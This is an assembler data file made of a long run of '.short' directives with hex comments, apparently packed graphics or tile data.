.short 403 ## 0x193
.short 0 ## 0x0
.short 0 ## 0x0
.short 51201 ## 0xc801
.short 403 ## 0x193
.short 0 ## 0x0
.short 0 ## 0x0
.short 51201 ## 0xc801
.short 403 ## 0x193
.short 0 ## 0x0
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 19271 ## 0x4b47
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 19787 ## 0x4d4b
.short 20045 ## 0x4e4d
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 20043 ## 0x4e4b
.short 771 ## 0x303
.short 18247 ## 0x4747
.short 19787 ## 0x4d4b
.short 846 ## 0x34e
.short 56026 ## 0xdada
.short 19271 ## 0x4b47
.short 846 ## 0x34e
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 19783 ## 0x4d47
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19783 ## 0x4d47
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 20043 ## 0x4e4b
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 846 ## 0x34e
.short 56026 ## 0xdada
.short 16858 ## 0x41da
.short 55873 ## 0xda41
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 55873 ## 0xda41
.short 56026 ## 0xdada
.short 771 ## 0x303
.short 19278 ## 0x4b4e
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 18251 ## 0x474b
.short 18247 ## 0x4747
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 19790 ## 0x4d4e
.short 18251 ## 0x474b
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 846 ## 0x34e
.short 19278 ## 0x4b4e
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 55811 ## 0xda03
.short 19971 ## 0x4e03
.short 16858 ## 0x41da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 55873 ## 0xda41
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18251 ## 0x474b
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18253 ## 0x474d
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 18253 ## 0x474d
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 8775 ## 0x2247
.short 19278 ## 0x4b4e
.short 19787 ## 0x4d4b
.short 18251 ## 0x474b
.short 9031 ## 0x2347
.short 0 ## 0x0
.short 29967 ## 0x750f
.short 29304 ## 0x7278
.short 29298 ## 0x7272
.short 0 ## 0x0
.short 29967 ## 0x750f
.short 29304 ## 0x7278
.short 29298 ## 0x7272
.short 0 ## 0x0
.short 3854 ## 0xf0e
.short 3855 ## 0xf0f
.short 3855 ## 0xf0f
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 29298 ## 0x7272
.short 29298 ## 0x7272
.short 22130 ## 0x5672
.short 14 ## 0xe
.short 29298 ## 0x7272
.short 29298 ## 0x7272
.short 3670 ## 0xe56
.short 0 ## 0x0
.short 28245 ## 0x6e55
.short 22130 ## 0x5672
.short 14 ## 0xe
.short 0 ## 0x0
.short 28175 ## 0x6e0f
.short 3670 ## 0xe56
.short 0 ## 0x0
.short 0 ## 0x0
.short 3854 ## 0xf0e
.short 14 ## 0xe
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 256 ## 0x100
.short 1 ## 0x1
.short 256 ## 0x100
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 1 ## 0x1
.short 1 ## 0x1
.short 256 ## 0x100
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 0 ## 0x0
.short 53761 ## 0xd201
.short 50115 ## 0xc3c3
.short 53955 ## 0xd2c3
.short 46339 ## 0xb503
.short 49921 ## 0xc301
.short 50130 ## 0xc3d2
.short 50115 ## 0xc3c3
.short 46005 ## 0xb3b5
.short 46337 ## 0xb501
.short 53763 ## 0xd203
.short 50115 ## 0xc3c3
.short 53970 ## 0xd2d2
.short 256 ## 0x100
.short 50130 ## 0xc3d2
.short 53955 ## 0xd2c3
.short 771 ## 0x303
.short 256 ## 0x100
.short 50101 ## 0xc3b5
.short 978 ## 0x3d2
.short 53970 ## 0xd2d2
.short 256 ## 0x100
.short 45890 ## 0xb342
.short 46515 ## 0xb5b3
.short 17333 ## 0x43b5
.short 0 ## 0x0
.short 16897 ## 0x4201
.short 17219 ## 0x4343
.short 322 ## 0x142
.short 0 ## 0x0
.short 256 ## 0x100
.short 771 ## 0x303
.short 1 ## 0x1
.short 978 ## 0x3d2
.short 50101 ## 0xc3b5
.short 46003 ## 0xb3b3
.short 323 ## 0x143
.short 46531 ## 0xb5c3
.short 46003 ## 0xb3b3
.short 46515 ## 0xb5b3
.short 324 ## 0x144
.short 53970 ## 0xd2d2
.short 50115 ## 0xc3c3
.short 949 ## 0x3b5
.short 322 ## 0x142
.short 771 ## 0x303
.short 50130 ## 0xc3d2
.short 45491 ## 0xb1b3
.short 1 ## 0x1
.short 53970 ## 0xd2d2
.short 46339 ## 0xb503
.short 17331 ## 0x43b3
.short 1 ## 0x1
.short 46403 ## 0xb543
.short 46005 ## 0xb3b5
.short 16925 ## 0x421d
.short 1 ## 0x1
.short 16897 ## 0x4201
.short 17219 ## 0x4343
.short 322 ## 0x142
.short 0 ## 0x0
.short 256 ## 0x100
.short 771 ## 0x303
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 51201 ## 0xc801
.short 403 ## 0x193
.short 0 ## 0x0
.short 0 ## 0x0
.short 51201 ## 0xc801
.short 403 ## 0x193
.short 0 ## 0x0
.short 0 ## 0x0
.short 51201 ## 0xc801
.short 410 ## 0x19a
.short 0 ## 0x0
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 769 ## 0x301
.short 50906 ## 0xc6da
.short 21702 ## 0x54c6
.short 259 ## 0x103
.short 55809 ## 0xda01
.short 966 ## 0x3c6
.short 50691 ## 0xc603
.short 852 ## 0x354
.short 55809 ## 0xda01
.short 39427 ## 0x9a03
.short 922 ## 0x39a
.short 852 ## 0x354
.short 50689 ## 0xc601
.short 771 ## 0x303
.short 771 ## 0x303
.short 852 ## 0x354
.short 18247 ## 0x4747
.short 19271 ## 0x4b47
.short 846 ## 0x34e
.short 771 ## 0x303
.short 18247 ## 0x4747
.short 20043 ## 0x4e4b
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 18247 ## 0x4747
.short 845 ## 0x34d
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19787 ## 0x4d4b
.short 55886 ## 0xda4e
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 846 ## 0x34e
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 846 ## 0x34e
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 846 ## 0x34e
.short 19278 ## 0x4b4e
.short 19015 ## 0x4a47
.short 19971 ## 0x4e03
.short 55811 ## 0xda03
.short 19715 ## 0x4d03
.short 19783 ## 0x4d47
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 20045 ## 0x4e4d
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 19971 ## 0x4e03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 769 ## 0x301
.short 52380 ## 0xcc9c
.short 52428 ## 0xcccc
.short 39884 ## 0x9bcc
.short 39937 ## 0x9c01
.short 41377 ## 0xa1a1
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 34305 ## 0x8601
.short 25443 ## 0x6363
.short 25443 ## 0x6363
.short 34912 ## 0x8860
.short 39681 ## 0x9b01
.short 24737 ## 0x60a1
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 39681 ## 0x9b01
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 24672 ## 0x6060
.short 34305 ## 0x8601
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 39681 ## 0x9b01
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 39835 ## 0x9b9b
.short 52428 ## 0xcccc
.short 52428 ## 0xcccc
.short 39884 ## 0x9bcc
.short 34977 ## 0x88a1
.short 24672 ## 0x6060
.short 41312 ## 0xa160
.short 34977 ## 0x88a1
.short 41377 ## 0xa1a1
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 41315 ## 0xa163
.short 41377 ## 0xa1a1
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 39835 ## 0x9b9b
.short 52428 ## 0xcccc
.short 52428 ## 0xcccc
.short 39884 ## 0x9bcc
.short 34977 ## 0x88a1
.short 24672 ## 0x6060
.short 41312 ## 0xa160
.short 34977 ## 0x88a1
.short 41377 ## 0xa1a1
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 41315 ## 0xa163
.short 41377 ## 0xa1a1
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 39835 ## 0x9b9b
.short 52428 ## 0xcccc
.short 52428 ## 0xcccc
.short 39884 ## 0x9bcc
.short 34977 ## 0x88a1
.short 24672 ## 0x6060
.short 41312 ## 0xa160
.short 34977 ## 0x88a1
.short 41377 ## 0xa1a1
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 41315 ## 0xa163
.short 41377 ## 0xa1a1
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 769 ## 0x301
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 39772 ## 0x9b5c
.short 52428 ## 0xcccc
.short 52428 ## 0xcccc
.short 39884 ## 0x9bcc
.short 34917 ## 0x8865
.short 24672 ## 0x6060
.short 41312 ## 0xa160
.short 34977 ## 0x88a1
.short 41317 ## 0xa165
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 41229 ## 0xa10d
.short 41377 ## 0xa1a1
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 25357 ## 0x630d
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25365 ## 0x6315
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 24597 ## 0x6015
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 39835 ## 0x9b9b
.short 52428 ## 0xcccc
.short 27340 ## 0x6acc
.short 259 ## 0x103
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 37216 ## 0x9160
.short 362 ## 0x16a
.short 41352 ## 0xa188
.short 25440 ## 0x6360
.short 24675 ## 0x6063
.short 361 ## 0x169
.short 34915 ## 0x8863
.short 24737 ## 0x60a1
.short 24675 ## 0x6063
.short 873 ## 0x369
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 873 ## 0x369
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 769 ## 0x301
.short 771 ## 0x303
.short 259 ## 0x103
.short 257 ## 0x101
.short 50459 ## 0xc51b
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 49691 ## 0xc21b
.short 16416 ## 0x4020
.short 16448 ## 0x4040
.short 8224 ## 0x2020
.short 49691 ## 0xc21b
.short 8264 ## 0x2048
.short 16448 ## 0x4040
.short 8224 ## 0x2020
.short 49691 ## 0xc21b
.short 18625 ## 0x48c1
.short 16416 ## 0x4020
.short 8256 ## 0x2040
.short 49675 ## 0xc20b
.short 49601 ## 0xc1c1
.short 8264 ## 0x2048
.short 8256 ## 0x2040
.short 49691 ## 0xc21b
.short 49626 ## 0xc1da
.short 18625 ## 0x48c1
.short 16416 ## 0x4020
.short 49675 ## 0xc20b
.short 49601 ## 0xc1c1
.short 49626 ## 0xc1da
.short 8264 ## 0x2048
.short 771 ## 0x303
.short 2819 ## 0xb03
.short 2827 ## 0xb0b
.short 779 ## 0x30b
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 49858 ## 0xc2c2
.short 962 ## 0x3c2
.short 8224 ## 0x2020
.short 8224 ## 0x2020
.short 9505 ## 0x2521
.short 962 ## 0x3c2
.short 8224 ## 0x2020
.short 8480 ## 0x2120
.short 6949 ## 0x1b25
.short 962 ## 0x3c2
.short 8224 ## 0x2020
.short 9505 ## 0x2521
.short 6923 ## 0x1b0b
.short 965 ## 0x3c5
.short 8480 ## 0x2120
.short 2853 ## 0xb25
.short 6950 ## 0x1b26
.short 965 ## 0x3c5
.short 9505 ## 0x2521
.short 771 ## 0x303
.short 16139 ## 0x3f0b
.short 962 ## 0x3c2
.short 2852 ## 0xb24
.short 9766 ## 0x2626
.short 2827 ## 0xb0b
.short 965 ## 0x3c5
.short 20043 ## 0x4e4b
.short 55811 ## 0xda03
.short 16858 ## 0x41da
.short 56026 ## 0xdada
.short 19271 ## 0x4b47
.short 846 ## 0x34e
.short 56026 ## 0xdada
.short 55873 ## 0xda41
.short 18247 ## 0x4747
.short 20043 ## 0x4e4b
.short 55811 ## 0xda03
.short 16858 ## 0x41da
.short 18247 ## 0x4747
.short 19783 ## 0x4d47
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 18247 ## 0x4747
.short 19271 ## 0x4b47
.short 846 ## 0x34e
.short 771 ## 0x303
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 19787 ## 0x4d4b
.short 20045 ## 0x4e4d
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 19271 ## 0x4b47
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 18247 ## 0x4747
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 16858 ## 0x41da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 55873 ## 0xda41
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 16705 ## 0x4141
.short 16705 ## 0x4141
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 56026 ## 0xdada
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 846 ## 0x34e
.short 55811 ## 0xda03
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 19787 ## 0x4d4b
.short 846 ## 0x34e
.short 771 ## 0x303
.short 19534 ## 0x4c4e
.short 16858 ## 0x41da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 55873 ## 0xda41
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 55873 ## 0xda41
.short 16858 ## 0x41da
.short 16705 ## 0x4141
.short 16705 ## 0x4141
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 16705 ## 0x4141
.short 55873 ## 0xda41
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 771 ## 0x303
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 771 ## 0x303
.short 20045 ## 0x4e4d
.short 771 ## 0x303
.short 771 ## 0x303
.short 19790 ## 0x4d4e
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 20046 ## 0x4e4e
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 19971 ## 0x4e03
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 20186 ## 0x4eda
.short 56026 ## 0xdada
.short 56026 ## 0xdada
.short 986 ## 0x3da
.short 19971 ## 0x4e03
.short 55811 ## 0xda03
.short 986 ## 0x3da
.short 19971 ## 0x4e03
.short 20045 ## 0x4e4d
.short 846 ## 0x34e
.short 19971 ## 0x4e03
.short 19277 ## 0x4b4d
.short 19783 ## 0x4d47
.short 19788 ## 0x4d4c
.short 19277 ## 0x4b4d
.short 18247 ## 0x4747
.short 19783 ## 0x4d47
.short 39681 ## 0x9b01
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 41315 ## 0xa163
.short 39681 ## 0x9b01
.short 24737 ## 0x60a1
.short 25440 ## 0x6360
.short 41315 ## 0xa163
.short 39681 ## 0x9b01
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 34305 ## 0x8601
.short 25440 ## 0x6360
.short 41312 ## 0xa160
.short 24712 ## 0x6088
.short 34305 ## 0x8601
.short 24712 ## 0x6088
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 27137 ## 0x6a01
.short 24673 ## 0x6061
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 769 ## 0x301
.short 26986 ## 0x696a
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 34915 ## 0x8863
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 24675 ## 0x6063
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 259 ## 0x103
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 34915 ## 0x8863
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 24675 ## 0x6063
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 257 ## 0x101
.short 771 ## 0x303
.short 259 ## 0x103
.short 257 ## 0x101
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24712 ## 0x6088
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 34915 ## 0x8863
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 24675 ## 0x6063
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 257 ## 0x101
.short 771 ## 0x303
.short 259 ## 0x103
.short 257 ## 0x101
.short 24664 ## 0x6058
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24664 ## 0x6058
.short 25440 ## 0x6360
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24597 ## 0x6015
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 34952 ## 0x8888
.short 24598 ## 0x6016
.short 41315 ## 0xa163
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 25447 ## 0x6367
.short 34915 ## 0x8863
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 24681 ## 0x6069
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25443 ## 0x6363
.short 26986 ## 0x696a
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 873 ## 0x369
.short 34915 ## 0x8863
.short 24712 ## 0x6088
.short 24675 ## 0x6063
.short 873 ## 0x369
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25699 ## 0x6463
